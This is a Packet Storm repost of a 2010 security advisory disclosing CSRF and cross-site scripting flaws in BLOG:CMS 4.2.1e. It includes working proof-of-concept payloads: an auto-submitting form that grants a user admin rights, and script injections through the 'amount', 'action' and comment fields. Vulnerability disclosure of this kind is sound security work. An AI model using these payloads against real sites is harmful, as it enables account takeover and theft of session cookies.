exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

BLOG:CMS 4.2.1e Cross Site Request Forgery / Cross Site Scripting

BLOG:CMS 4.2.1e Cross Site Request Forgery / Cross Site Scripting
Posted Dec 15, 2010
Authored by High-Tech Bridge SA | Site htbridge.com

BLOG:CMS versions 4.2.1e and below suffer from cross site request forgery and cross site scripting vulnerabilities.

tags | exploit, vulnerability, xss, csrf
SHA-256 | ddc26b3fa1bcdf7e1487319c93eac4eb1e64a80447f44813930a4ae823627b75

BLOG:CMS 4.2.1e Cross Site Request Forgery / Cross Site Scripting

Change Mirror Download
Vulnerability ID: HTB22727
Reference: http://www.htbridge.ch/advisory/xsrf_csrf_in_blogcms.html
Product: BLOG:CMS
Vendor: Radek Hulán ( http://blogcms.com/ )
Vulnerable Version: 4.2.1.e and probably prior versions
Vendor Notification: 30 November 2010
Vulnerability Type: CSRF (Cross-Site Request Forgery)
Status: Not Fixed, Vendor Alerted
Risk level: Low
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/)

XSRF/CSRF:
Vulnerability Details:
The vulnerability exists due to failure in the "admin/libs/ADMIN.php" script to properly verify the source of HTTP request.

Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.

Attacker can use browser to exploit this vulnerability. The following PoC is available:


<form action="http://host/admin/index.php" method="post" name="main">
<input type="hidden" name="action" value="changemembersettings">
<input type="hidden" name="memberid" value="USER_UD">
<input type="hidden" name="name" value="tester">
<input type="hidden" name="realname" value="tester">
<input type="hidden" name="password" value="">
<input type="hidden" name="repeatpassword" value="">
<input type="hidden" name="email" value="email@example.com">
<input type="hidden" name="url" value="">
<input type="hidden" name="admin" value="1">
<input type="hidden" name="canlogin" value="1">
<input type="hidden" name="notes" value="">
<input type="hidden" name="deflang" value="">
</form>
<script>
document.main.submit();
</script>


Stored XSS (HTB22724):
Vulnerability Details:
User can execute arbitrary JavaScript code within the vulnerable application.

The vulnerability exists due to failure in the "action.php" script to properly sanitize user-supplied input in "body" variable. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.

An attacker can use browser to exploit this vulnerability. Enter comment like <script>alert('XSS')</script> in "Add new comment" form.


XSS (HTB22725):
Vulnerability Details:
User can execute arbitrary JavaScript code within the vulnerable application.

The vulnerability exists due to failure in the "admin/index.php" script to properly sanitize user-supplied input in "amount" variable. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.

An attacker can use browser to exploit this vulnerability. The following PoC is available:

<form action="http://host/admin/index.php" method="post" name="main">
<input type="hidden" name="blogid" value="0">
<input type="hidden" name="itemid" value="0">
<input type="hidden" name="action" value="browseowncomments">
<input type="hidden" name="amount" value='10"><script>alert(document.cookie)</script>'>
<input type="hidden" name="start" value="0">
<input type="hidden" name="search" value="">
</form>
<script>
document.main.submit();
</script>

Solution: Upgrade to the most recent version


XSS(HTB22726):
Vulnerability Details:
User can execute arbitrary JavaScript code within the vulnerable application.

The vulnerability exists due to failure in the "admin/index.php" script to properly sanitize user-supplied input in "action" variable. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.

An attacker can use browser to exploit this vulnerability. The following PoC is available:
http://host/admin/index.php?action=settingsedit"><script>alert(document.cookie)</script>
Solution: Upgrade to the most recent version

Login or Register to add favorites

File Archive:

May 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    44 Files
  • 2
    May 2nd
    5 Files
  • 3
    May 3rd
    11 Files
  • 4
    May 4th
    0 Files
  • 5
    May 5th
    0 Files
  • 6
    May 6th
    0 Files
  • 7
    May 7th
    0 Files
  • 8
    May 8th
    0 Files
  • 9
    May 9th
    0 Files
  • 10
    May 10th
    0 Files
  • 11
    May 11th
    0 Files
  • 12
    May 12th
    0 Files
  • 13
    May 13th
    0 Files
  • 14
    May 14th
    0 Files
  • 15
    May 15th
    0 Files
  • 16
    May 16th
    0 Files
  • 17
    May 17th
    0 Files
  • 18
    May 18th
    0 Files
  • 19
    May 19th
    0 Files
  • 20
    May 20th
    0 Files
  • 21
    May 21st
    0 Files
  • 22
    May 22nd
    0 Files
  • 23
    May 23rd
    0 Files
  • 24
    May 24th
    0 Files
  • 25
    May 25th
    0 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close